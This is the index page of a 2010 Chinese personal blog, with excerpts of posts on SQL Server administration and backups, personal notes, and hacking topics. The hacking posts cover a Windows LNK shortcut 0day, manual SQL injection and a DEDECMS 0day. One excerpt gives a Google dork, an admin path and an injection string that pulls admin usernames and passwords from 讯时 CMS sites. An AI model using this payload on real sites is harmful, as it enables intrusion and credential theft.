
Mail:no-thinking@hotmail.com
Name:No Thinking: QQ:484794
I love to design beautiful and usable CSS websites.Find out more about me here.(The best resolution is 1024*768)
windows快捷方式自动执行0day漏洞攻击
Post by NO.THINKING, 2010-7-24, Views:昨天看到windows又爆出了一个关于lnk文件的 Zero Day,回家的路上搜索了下脑海中关于桌面快捷方式(LNK文件)有趣的事情,在这里贴出来和大家一起分享
一 LNK文件也可以成为一个木马下载器
1 一封垃圾邮件引发的病毒事件
2009年3月4日,大概是这一天,我拿到了一个台灣為何變窮的样本。具体是某人收到一封垃圾邮件,主题“看看我們的台灣要員是怎麼花納稅人的錢的”,寥 寥数语没意思,而附件的名为台灣為何變窮.lnk的快捷方式似乎没有什么特别的,但是当你查看属性的时候,会看到一些灵异的字符串,而熟悉命令行的将很容 易发现它在干什么
...
通杀所有讯时系统0day 经本人测试此0day通杀所有讯时系统
Post by NO.THINKING, 2010-5-28, Views:经测试此0day通杀所有讯时系统。
google关键字inurl:news_more.asp?lm2=
复制 代码
1. /admin/admin_news_pl_view.asp?id=1 //id任意 填入以下语句
2. 有时1显示错误信息的时候继续往后退2,3,4。。。。
3. |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
...
MSSQL权限管理
Post by NO.THINKING, 2010-5-18, Views:MS SQL Server 权限管理
--先创建一个DEMO数据库
CREATE DATABASE StudentMgr
ON
(
NAME = 'StudentMgr_DB_01',
...
恩
Post by NO.THINKING, 2010-5-2, Views:恩......
请不要催促他们----因为你在慢慢长大,而他们却在慢慢变老.......
在图形界面下,可以用事件探查器来跟踪sql server,多用在调试程序的时候,我们可以清楚地看到我们的程序向SQL SERVER发送了什么样的语句 ,有错误的话也很容易被发现。
Post by NO.THINKING, 2010-4-6, Views:在图形界面下,可以用事件探查器来跟踪sql server,多用在调试程序的时候,我们可以清楚地看到我们的程序向SQL SERVER发送了什么样的语句 ,有错误的话也很容易被发现。
如果没有图形界面,可以利用下面的语句来监控整台数据库服务器执行了哪些SQL语句 ,并保存到文件中, HACK中具体有什么作用就各自发挥吧。。要求SA权限。。
...MSSQL2005_数据库备份语句整理
Post by NO.THINKING, 2010-3-27, Views:--完整备份
Backup Database NorthwindCS
To disk='G:\Backup\NorthwindCS_Full_20070908.bak'
--差异备份
Backup Database NorthwindCS
...
sql 2005 用户、组或角色 在当前数据库中已存在 无法删除数据库所有用户 解决方法
Post by NO.THINKING, 2010-3-24, Views:sql server 2005 用户、组或角色 在当前数据库中已存在
问题:1. sql server2005 修改系统表不能修改
2. 错误信息:sql server 2005 用户、组或角色 在当前数据库中已存在
想手工把登录名与数据库中的用户名进行关联, 系统不让; 想删除数据库中的用户再重建, 竟然也不让删……
...总结搜索型手工注入的全过程
Post by NO.THINKING, 2010-3-24, Views:前段时间朋友丢了一个站过来,说是他们学校的。叫我帮忙检测下。
于是看了下。用扫描器扫了下,没有啥可以上传利用的,发现后台,默认和万能密码无效,
无注入点,手工和工具试过了,防注入,COOKIES注入也不行。找不到程序源码,没办法分析。旁注 ?
整站是独立服务器,就一个站,旁注也没办法。难到要C段?好麻烦哦。丢给群里一些大牛看看,
都说搞不定(应该是没认真看吧。),我大受打击,但是我不放弃,再去看看先。
于是,发现了一个搜索框,直觉告诉我,这就是突破点,果然.....
SQL手工注入笔记
Post by NO.THINKING, 2010-3-17, Views:判断数据库用到的注释符:
-- MSSQL注释符 /* MYSQL注释符
...经典吵架--张艺谋剧组领盒饭
Post by NO.THINKING, 2010-3-15, Views:“少个蛋你会死啊!”
————————旁白:会死,会死!
...
Hot Articles
Friend Connect
此处加载INCLUDE文件,内容可自定义New Articles
- [07/24]windows快捷方式自动执行0day漏洞攻击
- [05/28]通杀所有讯时系统0day 经本人测试此0day通杀所有讯时系统
- [05/18]MSSQL权限管理
- [05/02]恩
- [04/06]在图形界面下,可以用事件探查器来跟踪sql server,多用在调试程序的时候,我们可以清楚地看到我们的程序向SQL SERVER发送了什么样的语句 ,有错误的话也很容易被发现。
- [03/27]MSSQL2005_数据库备份语句整理
- [03/24]sql 2005 用户、组或角色 在当前数据库中已存在 无法删除数据库所有用户 解决方法
- [03/24]总结搜索型手工注入的全过程
- [03/17]SQL手工注入笔记
- [03/15]经典吵架--张艺谋剧组领盒饭
- [03/14]详解Windows下权限设置
- [03/13]XMLHTTP远程保存文件
- [03/11]SQL 学习--陆续更新一些学到的SQL语句
- [03/08]fckeditor aspx版上传
- [03/08]DEDECMS 0DAY FOR 5.5
Archives
Links
Statistics
- 文章总数:41
- 评论总数:4
- 引用总数:0
- 浏览总数:549
- 留言总数:2
- 当前主题:No Thinking
- 当前样式:Sean_Sim
